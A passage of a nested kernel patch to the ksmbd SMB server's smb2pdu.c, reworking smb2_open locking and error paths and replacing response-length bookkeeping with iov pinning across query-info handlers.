+ 				if (rc)
+ 					goto err_out;
+ 			}
+ 		}
+ 	}
+ 
+-	rc = ksmbd_query_inode_status(d_inode(path.dentry->d_parent));
++	rc = ksmbd_query_inode_status(path.dentry->d_parent);
+ 	if (rc == KSMBD_INODE_STATUS_PENDING_DELETE) {
+ 		rc = -EBUSY;
+ 		goto err_out;
+@@ -3040,7 +3088,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		struct inode *inode = d_inode(path.dentry);
+ 
+ 		posix_acl_rc = ksmbd_vfs_inherit_posix_acl(user_ns,
+-							   inode,
++							   &path,
+ 							   d_inode(path.dentry->d_parent));
+ 		if (posix_acl_rc)
+ 			ksmbd_debug(SMB, "inherit posix acl failed : %d\n", posix_acl_rc);
+@@ -3056,7 +3104,7 @@ int smb2_open(struct ksmbd_work *work)
+ 			if (rc) {
+ 				if (posix_acl_rc)
+ 					ksmbd_vfs_set_init_posix_acl(user_ns,
+-								     inode);
++								     &path);
+ 
+ 				if (test_share_config_flag(work->tcon->share_conf,
+ 							   KSMBD_SHARE_FLAG_ACL_XATTR)) {
+@@ -3096,9 +3144,10 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 					rc = ksmbd_vfs_set_sd_xattr(conn,
+ 								    user_ns,
+-								    path.dentry,
++								    &path,
+ 								    pntsd,
+-								    pntsd_size);
++								    pntsd_size,
++								    false);
+ 					kfree(pntsd);
+ 					if (rc)
+ 						pr_err("failed to store ntacl in xattr : %d\n",
+@@ -3121,11 +3170,6 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	fp->attrib_only = !(req->DesiredAccess & ~(FILE_READ_ATTRIBUTES_LE |
+ 			FILE_WRITE_ATTRIBUTES_LE | FILE_SYNCHRONIZE_LE));
+-	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
+-	    !fp->attrib_only && !stream_name) {
+-		smb_break_all_oplock(work, fp);
+-		need_truncate = 1;
+-	}
+ 
+ 	/* fp should be searchable through ksmbd_inode.m_fp_list
+ 	 * after daccess, saccess, attrib_only, and stream are
+@@ -3141,23 +3185,43 @@ int smb2_open(struct ksmbd_work *work)
+ 		goto err_out;
+ 	}
+ 
++	if (file_present || created)
++		ksmbd_vfs_kern_path_unlock(&parent_path, &path);
++
++	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
++	    !fp->attrib_only && !stream_name) {
++		smb_break_all_oplock(work, fp);
++		need_truncate = 1;
++	}
++
++	req_op_level = req->RequestedOplockLevel;
++	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
++		lc = parse_lease_state(req, S_ISDIR(file_inode(filp)->i_mode));
++
+ 	share_ret = ksmbd_smb_check_shared_mode(fp->filp, fp);
+ 	if (!test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_OPLOCKS) ||
+ 	    (req_op_level == SMB2_OPLOCK_LEVEL_LEASE &&
+ 	     !(conn->vals->capabilities & SMB2_GLOBAL_CAP_LEASING))) {
+ 		if (share_ret < 0 && !S_ISDIR(file_inode(fp->filp)->i_mode)) {
+ 			rc = share_ret;
+-			goto err_out;
++			goto err_out1;
+ 		}
+ 	} else {
+ 		if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE) {
++			/*
++			 * Compare parent lease using parent key. If there is no
++			 * a lease that has same parent key, Send lease break
++			 * notification.
++			 */
++			smb_send_parent_lease_break_noti(fp, lc);
++
+ 			req_op_level = smb2_map_lease_to_oplock(lc->req_state);
+ 			ksmbd_debug(SMB,
+ 				    "lease req for(%s) req oplock state 0x%x, lease state 0x%x\n",
+ 				    name, req_op_level, lc->req_state);
+ 			rc = find_same_lease_key(sess, fp->f_ci, lc);
+ 			if (rc)
+-				goto err_out;
++				goto err_out1;
+ 		} else if (open_flags == O_RDONLY &&
+ 			   (req_op_level == SMB2_OPLOCK_LEVEL_BATCH ||
+ 			    req_op_level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
+@@ -3168,16 +3232,16 @@ int smb2_open(struct ksmbd_work *work)
+ 				      le32_to_cpu(req->hdr.Id.SyncId.TreeId),
+ 				      lc, share_ret);
+ 		if (rc < 0)
+-			goto err_out;
++			goto err_out1;
+ 	}
+ 
+ 	if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)
+ 		ksmbd_fd_set_delete_on_close(fp, file_info);
+ 
+ 	if (need_truncate) {
+-		rc = smb2_create_truncate(&path);
++		rc = smb2_create_truncate(&fp->filp->f_path);
+ 		if (rc)
+-			goto err_out;
++			goto err_out1;
+ 	}
+ 
+ 	if (req->CreateContextsOffset) {
+@@ -3187,7 +3251,7 @@ int smb2_open(struct ksmbd_work *work)
+ 					SMB2_CREATE_ALLOCATION_SIZE, 4);
+ 		if (IS_ERR(az_req)) {
+ 			rc = PTR_ERR(az_req);
+-			goto err_out;
++			goto err_out1;
+ 		} else if (az_req) {
+ 			loff_t alloc_size;
+ 			int err;
+@@ -3196,7 +3260,7 @@ int smb2_open(struct ksmbd_work *work)
+ 			    le32_to_cpu(az_req->ccontext.DataLength) <
+ 			    sizeof(struct create_alloc_size_req)) {
+ 				rc = -EINVAL;
+-				goto err_out;
++				goto err_out1;
+ 			}
+ 			alloc_size = le64_to_cpu(az_req->AllocationSize);
+ 			ksmbd_debug(SMB,
+@@ -3214,7 +3278,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
+ 		if (IS_ERR(context)) {
+ 			rc = PTR_ERR(context);
+-			goto err_out;
++			goto err_out1;
+ 		} else if (context) {
+ 			ksmbd_debug(SMB, "get query on disk id context\n");
+ 			query_disk_id = 1;
+@@ -3223,7 +3287,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	rc = ksmbd_vfs_getattr(&path, &stat);
+ 	if (rc)
+-		goto err_out;
++		goto err_out1;
+ 
+ 	if (stat.result_mask & STATX_BTIME)
+ 		fp->create_time = ksmbd_UnixTimeToNT(stat.btime);
+@@ -3266,7 +3330,7 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	rsp->CreateContextsOffset = 0;
+ 	rsp->CreateContextsLength = 0;
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
++	iov_len = offsetof(struct smb2_create_rsp, Buffer);
+ 
+ 	/* If lease is request send lease context response */
+ 	if (opinfo && opinfo->is_lease) {
+@@ -3281,8 +3345,7 @@ int smb2_open(struct ksmbd_work *work)
+ 		create_lease_buf(rsp->Buffer, opinfo->o_lease);
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_lease_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_lease_size);
++		iov_len += conn->vals->create_lease_size;
+ 		next_ptr = &lease_ccontext->Next;
+ 		next_off = conn->vals->create_lease_size;
+ 	}
+@@ -3302,8 +3365,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				le32_to_cpu(maximal_access));
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_mxac_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_mxac_size);
++		iov_len += conn->vals->create_mxac_size;
+ 		if (next_ptr)
+ 			*next_ptr = cpu_to_le32(next_off);
+ 		next_ptr = &mxac_ccontext->Next;
+@@ -3321,8 +3383,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				stat.ino, tcon->id);
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_disk_id_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_disk_id_size);
++		iov_len += conn->vals->create_disk_id_size;
+ 		if (next_ptr)
+ 			*next_ptr = cpu_to_le32(next_off);
+ 		next_ptr = &disk_id_ccontext->Next;
+@@ -3336,8 +3397,7 @@ int smb2_open(struct ksmbd_work *work)
+ 				fp);
+ 		le32_add_cpu(&rsp->CreateContextsLength,
+ 			     conn->vals->create_posix_size);
+-		inc_rfc1001_len(work->response_buf,
+-				conn->vals->create_posix_size);
++		iov_len += conn->vals->create_posix_size;
+ 		if (next_ptr)
+ 			*next_ptr = cpu_to_le32(next_off);
+ 	}
+@@ -3348,10 +3408,17 @@ int smb2_open(struct ksmbd_work *work)
+ 	}
+ 
+ err_out:
+-	if (file_present || created)
+-		path_put(&path);
+-	ksmbd_revert_fsids(work);
++	if (rc && (file_present || created))
++		ksmbd_vfs_kern_path_unlock(&parent_path, &path);
++
+ err_out1:
++	ksmbd_revert_fsids(work);
++
++err_out2:
++	if (!rc) {
++		ksmbd_update_fstate(&work->sess->file_table, fp, FP_INITED);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp, iov_len);
++	}
+ 	if (rc) {
+ 		if (rc == -EINVAL)
+ 			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+@@ -3525,7 +3592,7 @@ static int smb2_populate_readdir_entry(struct ksmbd_conn *conn, int info_level,
+ 		goto free_conv_name;
+ 	}
+ 
+-	struct_sz = readdir_info_level_struct_sz(info_level) - 1 + conv_len;
++	struct_sz = readdir_info_level_struct_sz(info_level) + conv_len;
+ 	next_entry_offset = ALIGN(struct_sz, KSMBD_DIR_INFO_ALIGNMENT);
+ 	d_info->last_entry_off_align = next_entry_offset - struct_sz;
+ 
+@@ -3777,7 +3844,7 @@ static int reserve_populate_dentry(struct ksmbd_dir_info *d_info,
+ 		return -EOPNOTSUPP;
+ 
+ 	conv_len = (d_info->name_len + 1) * 2;
+-	next_entry_offset = ALIGN(struct_sz - 1 + conv_len,
++	next_entry_offset = ALIGN(struct_sz + conv_len,
+ 				  KSMBD_DIR_INFO_ALIGNMENT);
+ 
+ 	if (next_entry_offset > d_info->out_buf_len) {
+@@ -4077,7 +4144,10 @@ int smb2_query_dir(struct ksmbd_work *work)
+ 		rsp->OutputBufferOffset = cpu_to_le16(0);
+ 		rsp->OutputBufferLength = cpu_to_le32(0);
+ 		rsp->Buffer[0] = 0;
+-		inc_rfc1001_len(work->response_buf, 9);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				       sizeof(struct smb2_query_directory_rsp));
++		if (rc)
++			goto err_out;
+ 	} else {
+ no_buf_len:
+ 		((struct file_directory_info *)
+@@ -4089,7 +4159,11 @@ no_buf_len:
+ 		rsp->StructureSize = cpu_to_le16(9);
+ 		rsp->OutputBufferOffset = cpu_to_le16(72);
+ 		rsp->OutputBufferLength = cpu_to_le32(d_info.data_count);
+-		inc_rfc1001_len(work->response_buf, 8 + d_info.data_count);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				       offsetof(struct smb2_query_directory_rsp, Buffer) +
++				       d_info.data_count);
++		if (rc)
++			goto err_out;
+ 	}
+ 
+ 	kfree(srch_ptr);
+@@ -4130,27 +4204,18 @@ err_out2:
+  * @reqOutputBufferLength:	max buffer length expected in command response
+  * @rsp:		query info response buffer contains output buffer length
+  * @rsp_org:		base response buffer pointer in case of chained response
+- * @infoclass_size:	query info class response buffer size
+  *
+  * Return:	0 on success, otherwise error
+  */
+ static int buffer_check_err(int reqOutputBufferLength,
+ 			    struct smb2_query_info_rsp *rsp,
+-			    void *rsp_org, int infoclass_size)
++			    void *rsp_org)
+ {
+ 	if (reqOutputBufferLength < le32_to_cpu(rsp->OutputBufferLength)) {
+-		if (reqOutputBufferLength < infoclass_size) {
+-			pr_err("Invalid Buffer Size Requested\n");
+-			rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
+-			*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
+-			return -EINVAL;
+-		}
+-
+-		ksmbd_debug(SMB, "Buffer Overflow\n");
+-		rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
+-		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr) +
+-				reqOutputBufferLength);
+-		rsp->OutputBufferLength = cpu_to_le32(reqOutputBufferLength);
++		pr_err("Invalid Buffer Size Requested\n");
++		rsp->hdr.Status = STATUS_INFO_LENGTH_MISMATCH;
++		*(__be32 *)rsp_org = cpu_to_be32(sizeof(struct smb2_hdr));
++		return -EINVAL;
+ 	}
+ 	return 0;
+ }
+@@ -4169,7 +4234,6 @@ static void get_standard_info_pipe(struct smb2_query_info_rsp *rsp,
+ 	sinfo->Directory = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_standard_info));
+ }
+ 
+ static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
+@@ -4183,7 +4247,6 @@ static void get_internal_info_pipe(struct smb2_query_info_rsp *rsp, u64 num,
+ 	file_info->IndexNumber = cpu_to_le64(num | (1ULL << 63));
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+ }
+ 
+ static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
+@@ -4209,14 +4272,12 @@ static int smb2_get_info_file_pipe(struct ksmbd_session *sess,
+ 	case FILE_STANDARD_INFORMATION:
+ 		get_standard_info_pipe(rsp, rsp_org);
+ 		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_STANDARD_INFORMATION_SIZE);
++				      rsp, rsp_org);
+ 		break;
+ 	case FILE_INTERNAL_INFORMATION:
+ 		get_internal_info_pipe(rsp, id, rsp_org);
+ 		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, rsp_org,
+-				      FILE_INTERNAL_INFORMATION_SIZE);
++				      rsp, rsp_org);
+ 		break;
+ 	default:
+ 		ksmbd_debug(SMB, "smb2_info_file_pipe for %u not supported\n",
+@@ -4384,7 +4445,6 @@ done:
+ 	if (rsp_data_cnt == 0)
+ 		rsp->hdr.Status = STATUS_NO_EAS_ON_FILE;
+ 	rsp->OutputBufferLength = cpu_to_le32(rsp_data_cnt);
+-	inc_rfc1001_len(rsp_org, rsp_data_cnt);
+ out:
+ 	kvfree(xattr_list);
+ 	return rc;
+@@ -4399,7 +4459,6 @@ static void get_file_access_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->AccessFlags = fp->daccess;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_access_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_access_info));
+ }
+ 
+ static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+@@ -4429,7 +4488,6 @@ static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+ 	basic_info->Pad1 = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_basic_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_basic_info));
+ 	return 0;
+ }
+ 
+@@ -4454,8 +4512,6 @@ static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+ 	sinfo->Directory = S_ISDIR(stat.mode) ? 1 : 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_standard_info));
+ }
+ 
+ static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
+@@ -4467,8 +4523,6 @@ static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->AlignmentRequirement = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_alignment_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_alignment_info));
+ }
+ 
+ static int get_file_all_info(struct ksmbd_work *work,
+@@ -4532,7 +4586,6 @@ static int get_file_all_info(struct ksmbd_work *work,
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_all_info) + conv_len - 1);
+ 	kfree(filename);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+ 	return 0;
+ }
+ 
+@@ -4555,7 +4608,6 @@ static void get_file_alternate_info(struct ksmbd_work *work,
+ 	file_info->FileNameLength = cpu_to_le32(conv_len);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_alt_name_info) + conv_len);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+ }
+ 
+ static void get_file_stream_info(struct ksmbd_work *work,
+@@ -4655,7 +4707,6 @@ out:
+ 	kvfree(xattr_list);
+ 
+ 	rsp->OutputBufferLength = cpu_to_le32(nbytes);
+-	inc_rfc1001_len(rsp_org, nbytes);
+ }
+ 
+ static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
+@@ -4670,7 +4721,6 @@ static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->IndexNumber = cpu_to_le64(stat.ino);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+ }
+ 
+ static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+@@ -4706,7 +4756,6 @@ static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->Reserved = cpu_to_le32(0);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_ntwrk_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ntwrk_info));
+ 	return 0;
+ }
+ 
+@@ -4718,7 +4767,6 @@ static void get_file_ea_info(struct smb2_query_info_rsp *rsp, void *rsp_org)
+ 	file_info->EASize = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_ea_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ea_info));
+ }
+ 
+ static void get_file_position_info(struct smb2_query_info_rsp *rsp,
+@@ -4730,7 +4778,6 @@ static void get_file_position_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_pos_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_pos_info));
+ }
+ 
+ static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
+@@ -4742,7 +4789,6 @@ static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->Mode = fp->coption & FILE_MODE_INFO_MASK;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_mode_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_mode_info));
+ }
+ 
+ static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
+@@ -4764,7 +4810,6 @@ static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
+ 
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_comp_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_comp_info));
+ }
+ 
+ static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
+@@ -4783,11 +4828,10 @@ static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->ReparseTag = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_attr_tag_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_attr_tag_info));
+ 	return 0;
+ }
+ 
+-static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
++static void find_file_posix_info(struct smb2_query_info_rsp *rsp,
+ 				struct ksmbd_file *fp, void *rsp_org)
+ {
+ 	struct smb311_posix_qinfo *file_info;
+@@ -4825,8 +4869,6 @@ static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
+ 		  SIDUNIX_GROUP, (struct smb_sid *)&file_info->Sids[16]);
+ 
+ 	rsp->OutputBufferLength = cpu_to_le32(out_buf_len);
+-	inc_rfc1001_len(rsp_org, out_buf_len);
+-	return out_buf_len;
+ }
+ 
+ static int smb2_get_info_file(struct ksmbd_work *work,
+@@ -4836,7 +4878,6 @@ static int smb2_get_info_file(struct ksmbd_work *work,
+ 	struct ksmbd_file *fp;
+ 	int fileinfoclass = 0;
+ 	int rc = 0;
+-	int file_infoclass_size;
+ 	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+ 
+ 	if (test_share_config_flag(work->tcon->share_conf,
+@@ -4869,85 +4910,69 @@ static int smb2_get_info_file(struct ksmbd_work *work,
+ 	switch (fileinfoclass) {
+ 	case FILE_ACCESS_INFORMATION:
+ 		get_file_access_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ACCESS_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_BASIC_INFORMATION:
+ 		rc = get_file_basic_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_BASIC_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_STANDARD_INFORMATION:
+ 		get_file_standard_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STANDARD_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ALIGNMENT_INFORMATION:
+ 		get_file_alignment_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_ALIGNMENT_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ALL_INFORMATION:
+ 		rc = get_file_all_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALL_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ALTERNATE_NAME_INFORMATION:
+ 		get_file_alternate_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALTERNATE_NAME_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_STREAM_INFORMATION:
+ 		get_file_stream_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STREAM_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_INTERNAL_INFORMATION:
+ 		get_file_internal_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_INTERNAL_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_NETWORK_OPEN_INFORMATION:
+ 		rc = get_file_network_open_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_NETWORK_OPEN_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_EA_INFORMATION:
+ 		get_file_ea_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_EA_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_FULL_EA_INFORMATION:
+ 		rc = smb2_get_ea(work, fp, req, rsp, work->response_buf);
+-		file_infoclass_size = FILE_FULL_EA_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_POSITION_INFORMATION:
+ 		get_file_position_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_POSITION_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_MODE_INFORMATION:
+ 		get_file_mode_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_MODE_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_COMPRESSION_INFORMATION:
+ 		get_file_compression_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_COMPRESSION_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ATTRIBUTE_TAG_INFORMATION:
+ 		rc = get_file_attribute_tag_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ATTRIBUTE_TAG_INFORMATION_SIZE;
+ 		break;
+ 	case SMB_FIND_FILE_POSIX_INFO:
+ 		if (!work->tcon->posix_extensions) {
+ 			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
+ 			rc = -EOPNOTSUPP;
+ 		} else {
+-			file_infoclass_size = find_file_posix_info(rsp, fp,
+-					work->response_buf);
++			find_file_posix_info(rsp, fp, work->response_buf);
+ 		}
+ 		break;
+ 	default:
+@@ -4957,8 +4982,7 @@ static int smb2_get_info_file(struct ksmbd_work *work,
+ 	}
+ 	if (!rc)
+ 		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, work->response_buf,
+-				      file_infoclass_size);
++				      rsp, work->response_buf);
+ 	ksmbd_fd_put(work, fp);
+ 	return rc;
+ }
+@@ -4974,7 +4998,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 	struct kstatfs stfs;
+ 	struct path path;
+ 	int rc = 0, len;
+-	int fs_infoclass_size = 0;
+ 
+ 	if (!share->path)
+ 		return -EIO;
+@@ -5004,8 +5027,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->DeviceType = cpu_to_le32(stfs.f_type);
+ 		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
+ 		rsp->OutputBufferLength = cpu_to_le32(8);
+-		inc_rfc1001_len(work->response_buf, 8);
+-		fs_infoclass_size = FS_DEVICE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_ATTRIBUTE_INFORMATION:
+@@ -5034,8 +5055,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->FileSystemNameLen = cpu_to_le32(len);
+ 		sz = sizeof(struct filesystem_attribute_info) - 2 + len;
+ 		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_ATTRIBUTE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_VOLUME_INFORMATION:
+@@ -5062,8 +5081,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->Reserved = 0;
+ 		sz = sizeof(struct filesystem_vol_info) - 2 + len;
+ 		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_VOLUME_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_SIZE_INFORMATION:
+@@ -5076,8 +5093,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+ 		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+ 		rsp->OutputBufferLength = cpu_to_le32(24);
+-		inc_rfc1001_len(work->response_buf, 24);
+-		fs_infoclass_size = FS_SIZE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_FULL_SIZE_INFORMATION:
+@@ -5093,8 +5108,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+ 		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+ 		rsp->OutputBufferLength = cpu_to_le32(32);
+-		inc_rfc1001_len(work->response_buf, 32);
+-		fs_infoclass_size = FS_FULL_SIZE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_OBJECT_ID_INFORMATION:
+@@ -5114,8 +5127,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->extended_info.rel_date = 0;
+ 		memcpy(info->extended_info.version_string, "1.1.0", strlen("1.1.0"));
+ 		rsp->OutputBufferLength = cpu_to_le32(64);
+-		inc_rfc1001_len(work->response_buf, 64);
+-		fs_infoclass_size = FS_OBJECT_ID_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_SECTOR_SIZE_INFORMATION:
+@@ -5137,8 +5148,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->ByteOffsetForSectorAlignment = 0;
+ 		info->ByteOffsetForPartitionAlignment = 0;
+ 		rsp->OutputBufferLength = cpu_to_le32(28);
+-		inc_rfc1001_len(work->response_buf, 28);
+-		fs_infoclass_size = FS_SECTOR_SIZE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_CONTROL_INFORMATION:
+@@ -5159,8 +5168,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->DefaultQuotaLimit = cpu_to_le64(SMB2_NO_FID);
+ 		info->Padding = 0;
+ 		rsp->OutputBufferLength = cpu_to_le32(48);
+-		inc_rfc1001_len(work->response_buf, 48);
+-		fs_infoclass_size = FS_CONTROL_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_POSIX_INFORMATION:
+@@ -5180,8 +5187,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 			info->TotalFileNodes = cpu_to_le64(stfs.f_files);
+ 			info->FreeFileNodes = cpu_to_le64(stfs.f_ffree);
+ 			rsp->OutputBufferLength = cpu_to_le32(56);
+-			inc_rfc1001_len(work->response_buf, 56);
+-			fs_infoclass_size = FS_POSIX_INFORMATION_SIZE;
+ 		}
+ 		break;
+ 	}
+@@ -5190,8 +5195,7 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		return -EOPNOTSUPP;
+ 	}
+ 	rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-			      rsp, work->response_buf,
+-			      fs_infoclass_size);
++			      rsp, work->response_buf);
+ 	path_put(&path);
+ 	return rc;
+ }
+@@ -5225,7 +5229,6 @@ static int smb2_get_info_sec(struct ksmbd_work *work,
+ 
+ 		secdesclen = sizeof(struct smb_ntsd);
+ 		rsp->OutputBufferLength = cpu_to_le32(secdesclen);
+-		inc_rfc1001_len(work->response_buf, secdesclen);
+ 
+ 		return 0;
+ 	}
+@@ -5270,7 +5273,6 @@ static int smb2_get_info_sec(struct ksmbd_work *work,
+ 		return rc;
+ 
+ 	rsp->OutputBufferLength = cpu_to_le32(secdesclen);
+-	inc_rfc1001_len(work->response_buf, secdesclen);
+ 	return 0;
+ }
+ 
